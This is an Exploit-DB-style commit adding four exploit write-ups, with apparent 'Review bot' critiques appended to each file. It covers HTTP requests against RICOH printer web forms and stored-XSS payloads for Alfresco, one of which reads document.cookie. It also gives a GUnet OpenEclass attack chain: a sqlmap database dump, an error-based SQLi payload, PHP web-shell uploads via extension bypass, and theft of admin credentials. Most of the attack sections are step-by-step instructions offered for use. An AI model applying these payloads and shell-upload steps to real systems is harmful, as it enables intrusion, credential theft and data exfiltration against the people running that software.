DB: 2020-03-04

4 changes to exploits/shellcodes

RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
Alfresco 5.2.4 - Persistent Cross-Site Scripting
GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
Offensive Security 2020-03-04 05:01:50 +00:00
parent afe5797b88
commit d85ad29bbc
5 changed files with 345 additions and 0 deletions

exploits/hardware/webapps/48161.txt

@ -0,0 +1,73 @@
# Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
# Discovery by: Paulina Girón
# Discovery Date: 2020-03-02
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re2/model/sp52s/sp52s.htm
# Product Version: RICOH Aficio SP 5200S Printer
# Vulnerability Type: Code Injection - HTML Injection
# Steps to Produce the HTML Injection:
#1.- HTTP POST Request 'adrsGetUser.cgi':
POST /web/entry/es/address/adrsGetUser.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 447
Cache-Control: max-age=0
Origin: http://xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsList.cgi
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
Connection: close
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=13&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00005=ADRS_ENTRY_USER&00006=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00009=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER
#HTTP Response :
HTTP/1.0 200 OK
Date: Mon, 02 Mar 2020 15:15:59 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 Mar 2020 15:15:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
#2.- HTTP POST Request 'adrsSetUser.cgi':
POST /web/entry/es/address/adrsSetUser.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 611
Cache-Control: max-age=0
Origin: http://xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsGetUser.cgi
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
Connection: close
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00012&entryNameIn=prueba&entryDisplayNameIn=prueba&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
#HTTP Response :
HTTP/1.0 200 OK
Date: Mon, 02 Mar 2020 15:17:10 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 Mar 2020 15:17:10 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
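Review bot: neither request in this PoC carries any HTML in `entryNameIn`, so the hunk does not demonstrate the injection it is titled for: step 1 sends `entryNameIn=` (empty) and step 2 sends `entryNameIn=prueba&entryDisplayNameIn=prueba`, and both captured responses stop at the headers, so nothing shows markup being rendered unescaped. The file should include the actual markup submitted in `entryNameIn` and the fragment of the page on which it renders (the `wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE` parameter suggests the address-book list is where the stored name is displayed). Two documentation gaps as well: both requests carry `risessionid` and `wimsesid` session cookies, so the header should state that an authenticated session on the printer's web interface with permission to add address-book entries is required, and `Product Version: RICOH Aficio SP 5200S Printer` repeats the product name instead of giving the firmware or web-module version that was tested.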

exploits/hardware/webapps/48164.txt

@ -0,0 +1,73 @@
# Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
# Discovery by: Olga Villagran
# Discovery Date: 2020-03-02
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/rc3/model/sp52s/sp52s.htm?lang=es
# Product Version: RICOH Aficio SP 5210SF Printer
# Vulnerability Type: Code Injection - HTML Injection
# Steps to Produce the HTML Injection:
#1.- HTTP POST Request 'adrsGetUser.cgi':
POST /web/entry/en/address/adrsGetUser.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 402
Connection: close
Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
Upgrade-Insecure-Requests: 1
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=8&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER&00012=ADRS_ENTRY_USER
#HTTP Response :
HTTP/1.0 200 OK
Date: Mon, 02 Mar 2020 22:22:44 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 Mar 2020 22:22:44 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
#2.- HTTP POST Request 'adrsSetUser.cgi':
POST /web/entry/en/address/adrsSetUser.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsGetUser.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 607
Connection: close
Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
Upgrade-Insecure-Requests: 1
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00005&entryNameIn=test&entryDisplayNameIn=test&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
#HTTP Response :
HTTP/1.0 200 OK
Date: Mon, 02 Mar 2020 22:23:10 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 Mar 2020 22:23:10 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
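Review bot: same gap as the SP 5200S file: `entryNameIn=test&entryDisplayNameIn=test` is a plain string rather than an HTML payload, and both responses are cut at the headers, so the injection is asserted but never shown; include the submitted markup and the response fragment in which it renders. The `Hardware Link` (`.../rc3/model/sp52s/sp52s.htm?lang=es`) is the same `sp52s` support page that the SP 5200S entry links to, although this entry is titled SP 5210SF; confirm that the page covers the 5210SF or point at the correct product page, and replace `Product Version: RICOH Aficio SP 5210SF Printer` with the firmware version actually tested. As in the other file, the `risessionid`/`wimsesid` cookies imply an authenticated session, which the header does not mention.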

exploits/php/webapps/48162.txt

@ -0,0 +1,79 @@
# Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting
# Date: 2020-03-02
# Exploit Author: Romain LOISEL & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
# Vendor Homepage: https://www.alfresco.com/
# Software Link: https://www.alfresco.com/ecm-software
# Version: Alfresco before 5.2.4
# Tested on: 5.2.4
# CVE : CVE-2020-8776, CVE-2020-8777, CVE-2020-8778
# Security advisory: https://gitlab.com/snippets/1937042
### Stored XSS n°1 - Document URL - CVE-2020-8776 (found by Alexandre ZANNI)
Each file has a set of properties than can be edited by any authenticated user
that have write access on the project or the file.
The **URL** property of the file provided by the user is injected in the `href`
attribute of the HTML link without a proper escaping.
- Where? In URL property
- Payload: `" onmouseover="alert(document.cookie)"`
- Details: On the document explorer, the value is injected in a span tag. But on the detailed view of the file, it's inserted in the `href` attribute of a `a` tag. `http://` is prefixed before the payload provided by the user but can be bypassed. The generated vulnerable link will look like that:
```html
<a target="_blank" href="http://" onmouseover="alert(document.cookie)" "=" ">http://" onmouseover="alert(document.cookie)"</a>
```
- Privileges: It requires write privileges to store it, any user with read access can see it.
- Steps to reproduce:
1. Go to _Document Library_
2. Upload a file or click _Edit properties_ on an existing file
3. Enter the payload in the URL property
4. Click on the file title to go on the detailed page of the file
5. Hover the displayed link to trigger the XSS
### Stored XSS n°2 - User profile photo upload / Document viewing - CVE-2020-8777 (found by Alexandre ZANNI)
There is no file restriction for photo uploading in the user profile page.
Then the profile picture can be seen in the browser.
- Where? In user profile photo
- Payload:
```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,200 200,200 200,0" fill="#FF6804" stroke="#000000"/>
<script type="text/javascript">
alert('XSS - Orange Cyberdefense');
</script>
</svg>
```
- Details: The XSS is not triggerred everywhere, only with the _View in browser_ feature.
- Privileges: Any authenticated user can store it or trigger it.
- Steps to reproduce:
1. Go to your user profile page (`/share/page/user/<username>/profile`)
2. In the _Photo_ section, click _Upload_ and upload the SVG payload file
3. Use the document browser or any dashboard to find the uploaded file
4. Click on the title to go to the detailed page of the file
5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
### Stored XSS n°3 - Generic file upload / Document viewing - CVE-2020-8778 (found by Romain LOISEL)
This is the generic version of the previous XSS. Uploading dangerous file types
is allowed and then they can be viewed to triggered the XSS. The difference
between the two is that this one requires right access on a project to upload
documents so the XSS is not exploitable with a read only account but the
previous one can be exploited by any user as any user is allowed to have a
profile photo.
- Where? Uploading a document anywhere
- Payload: any file type that can store and execute a JavaScript payload (eg. HTML, SVG, XML, etc.)
- Details: The XSS is triggerred only with the _View in browser_ feature.
- Privileges: Any authenticated user with write access to a project can store it and any user that have read access to the file or project can trigger it.
- Steps to reproduce:
1. Go to a project dashboard
2. IClick _Upload_ and upload a dangerous file
3. Use the document browser or any dashboard to find the uploaded file
4. Click on the title to go to the detailed page of the file
5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
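Review bot: the header contradicts itself on the affected range: `Version: Alfresco before 5.2.4` implies 5.2.4 is fixed, while the title and `Tested on: 5.2.4` say the three XSS were reproduced on 5.2.4; state one consistent affected range (and the fixed release, if the linked advisory gives it). Minor text fixes in the body: `properties than can be edited` should read `that can be edited`; `triggerred` appears in the Details line of both XSS n°2 and n°3 and should be `triggered`; `viewed to triggered the XSS` should be `viewed to trigger the XSS`; and step 2 of XSS n°3 has a stray character in `IClick _Upload_`.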

exploits/php/webapps/48163.txt

@ -0,0 +1,116 @@
# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007"
# Date: 2020-03-02
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -
Older versions are also vulnerable.
Source code:
http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
Setup instructions:
http://download.openeclass.org/files/docs/1.7/Install.pdf
Changelog:
https://download.openeclass.org/files/docs/1.7/CHANGES.txt
Manual:
https://download.openeclass.org/files/docs/1.7/eClass.pdf
############################################################################
Unauthenticated Information Disclosure
System info
127.0.0.1/modules/admin/sysinfo
(powered by phpSysInfo 2.0 that is also vulnerable)
Web-App version info
127.0.0.1/README.txt
127.0.0.1/info/about.php
127.0.0.1/upgrade/CHANGES.txt
############################################################################
(Authenticated - Requires student account) - Error-Based SQLi
https://127.0.0.1/modules/agenda/myagenda.php?month=3&year=2020
sqlmap -u "https://127.0.0.1/modules/agenda/myagenda.php?month=2&year=2020" --batch --dump
---
Parameter: month (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: month=5' AND (SELECT 9183 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9183=9183,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Hztw&year=2020'
---
Almost every parameter will be either error-based, boolean-based or time-based vulnerable.
If you have a student account I recommend using this error-based SQLi because you will get all the database content really faster.
If you dont have an account use the following exploit that exploits an unauthenticated time-based blind injection.
It will definately be a slower proccess but you will get the administrator account pretty fast and move on with exploiting other authenticated vulnerabilities.
https://www.exploit-db.com/exploits/48106
############################################################################
(Authenticated - Requires student account) - PHP upload file extension bypass
If you have a student account you can bypass file extension restrictions and upload a PHP shell.
Register as user if the application is configured to allow registrations or use an SQLi to find an account that already exists.
Start looking for a class that you can submit an exercise as a student.
Register in that class and navigate to submit you exercise.
If you try to upload a .php file it will be renamed to .phps to prevent execution.
You can upload your PHP shell by spoofing the extension simply by renaming your .php file to .php3 or .PhP
Once you have uploaded it, open your course directory and then add "work" directory at the end
Course link example: https://127.0.0.1/courses/CS101/
Course link becomes: https://127.0.0.1/courses/CS101/work/
Directory listing will most likely be enabled by default and you will be able to view the directories.
Your shell will be in one of the multiple random alphanumeric directories that look like this /4a0c01h2nad9b/
Final shell link will look like this: https://127.0.0.1/courses/CS101/work/4a0c01h2nad9b/shell.php3
The same method works with "groups" if you cant find a class that supports submitting an exercise.
https://127.0.0.1/modules/group/group.php
############################################################################
(Authenticated - Requires student account) - View assessments of other students
If you have a student account you can view uploaded assessments from other students before or after the deadline that the professor has set.
Find the course link you are interested in.
https://127.0.0.1/courses/CS101
Add "work" directory at the end
https://127.0.0.1/courses/CS101/work/
Directory listing will most likely be enabled by default and you will be able to view and download other students' uploaded assessments.
############################################################################
(Authenticated - Requires admin account) - Upload PHP files
You have to login to the platform as an administrator or user with admin rights.
You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the
following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results.
Once you have logged in as admin:
1) Navigate to 127.0.0.1/modules/course_info/restore_course.php
2) Upload your .php shell compressed in a .zip file
3) Ignore the error message
4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php
############################################################################
(Authenticated - Requires admin account) - phpMyAdmin Remote Access
127.0.0.1/modules/admin/mysql
phpMyAdmin 2.10.0.2 is installed by default and allows remote logins
Once you have uploaded your shell can view the config.php file that contains the mysql password
127.0.0.1/config/config.php
############################################################################
(Authenticated - Requires admin account) - Plaintext password storage
When logged in as admin you can view all registered users credentials as plaintext.
127.0.0.1/modules/admin/listusers.php
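Review bot: step 4 of the restore_course.php section gives the upload location as `127.0.0.1/cources/tmpUnzipping/[your-shell-name].php`, while every other path in the file uses `/courses/` (for example `https://127.0.0.1/courses/CS101/work/`); confirm which spelling the application really uses, because a reader copying the path as written will get a 404 if it is a typo. The `.php3` / `.PhP` extension bypass should say which variant was verified to execute on the `Tested on` stack (Apache 2.2.22, PHP 5.3.10): renaming the file past the application's `.phps` check only helps if the web server's PHP handler mapping also picks the extension up, and the mixed-case `.PhP` variant in particular depends on a case-insensitive match. Spelling: `definately`, `proccess`, `dont`, `cant`, and `submit you exercise` (should be `your`). The sqlmap command uses `month=2` while the URL on the line above it uses `month=3`; harmless, but one value would read more cleanly.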

files.csv

@ -42427,3 +42427,7 @@ id,file,description,date,author,type,platform,port
48155,exploits/hardware/webapps/48155.py,"TP LINK TL-WR849N - Remote Code Execution",2020-03-02,"Elber Tavares",webapps,hardware,
48158,exploits/hardware/webapps/48158.txt,"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)",2020-03-02,"Elber Tavares",webapps,hardware,
48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,
48161,exploits/hardware/webapps/48161.txt,"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection",2020-03-03,"Paulina Girón",webapps,hardware,
48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,
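Review bot: the four new rows carry the date 2020-03-03, while the files themselves say `Discovery Date: 2020-03-02` (both RICOH entries) and `Date: 2020-03-02` (Alfresco and OpenEclass); confirm whether this column is meant to hold the publication date or the file's own date, and align the rows accordingly. Row 48162 also credits only `Alexandre ZANNI`, whereas the file's `Exploit Author` line names `Romain LOISEL & Alexandre ZANNI` and attributes CVE-2020-8778 to Romain LOISEL, so the author field should carry both names.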
